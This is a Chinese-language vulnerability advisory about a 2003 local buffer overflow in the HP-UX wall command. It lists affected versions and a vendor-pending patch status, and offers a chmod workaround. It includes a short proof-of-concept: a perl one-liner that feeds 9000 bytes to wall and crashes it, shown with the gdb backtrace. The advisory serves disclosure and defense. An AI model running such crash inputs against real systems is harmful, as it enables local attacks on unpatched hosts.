HP-UX Wall消息本地缓冲区溢出漏洞
发布日期:2003-02-07
更新日期:2003-02-12
受影响系统:HP Wall
- HP HP-UX 11.20
- HP HP-UX 11.11
- HP HP-UX 11.04
- HP HP-UX 11.0
描述:
BUGTRAQ ID:
6800
HP-UX是惠普公司开发和维护的商业性质UNIX操作系统。
HP-UX包含的wall对超多的数据广播存在问题,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以tty权限在系统上执行任意指令。
Wall在HP-UX上如下方法工作:
echo "Something to Say" > file
wall file
当我们把9000个A放到文件里让wall广播时就会发生段错误,精心构建要广播的数据可能以tty权限在系统上执行任意指令。
<*来源:Scotty (
smackenz@oakey.no-ip.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=104463345909965&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Scotty (
smackenz@oakey.no-ip.com)提供了如下测试方法:
perl -e 'print "A" x 9000' > /tmp/out
/usr/sbin/wall /tmp/out
bash-2.04$ /usr/sbin/wall /tmp/out
Segmentation fault
使用gdb查看如下:
Program received signal SIGSEGV, Segmentation fault.
0x7f779c08 in strcat () from /usr/lib/libc.2
(gdb) bt
7f779c08 in strcat () from /usr/lib/libc.2
#1 0x34dc in ?? ()
#2 0x34dc in ?? ()
#3 0x34dc in ?? ()
#4 0x34dc in ?? ()
Error accessing memory address 0xffffffff: Bad address.
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* chmod -s /usr/sbin/wall
厂商补丁:
HP
--
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://itrc.hp.com浏览次数:3094
严重程度:1(网友投票)